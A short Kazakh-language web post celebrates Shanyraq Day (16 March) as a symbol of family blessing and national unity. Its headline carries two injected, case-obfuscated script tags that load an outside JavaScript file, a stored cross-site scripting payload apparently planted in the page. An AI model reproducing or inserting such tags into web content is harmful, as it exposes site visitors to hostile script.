16 наурыз – Шаңырақ күні: Береке мен бірліктің нышаны<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.03.2025

Қазақ халқы үшін шаңырақ –  отбасының берекесін, ел мен жердің тұтастығын бейнелейтін қасиетті ұғым. 
16 наурыз – Шаңырақ күні, ұлттық құндылықтарымызды ұлықтайтын, ұрпақтар сабақтастығын дәріптейтін ерекше күн.

Шаңырақ – әкенің аманаты, ананың мейірімі, баланың болашағы. Ол – туған жердің киесі, атамекеннің шежіресі. Бұл күні әр шаңырақта ізгі тілектер айтылып, үлкендерге құрмет көрсетіліп, отбасылық дәстүрлер жаңғырады.

Бүгін бір-бірімізге жүрекжарды лебіз білдіріп, отбасы құндылықтарын дәріптейік! Әр шаңырақтың керегесі кең, босағасы берік, түтіні түзу болсын!

#nauryznama2025 
#біртұтас_тәрбие

Просмотров: 555


Пікір қосу



Деректерді қолтаңбаға қосу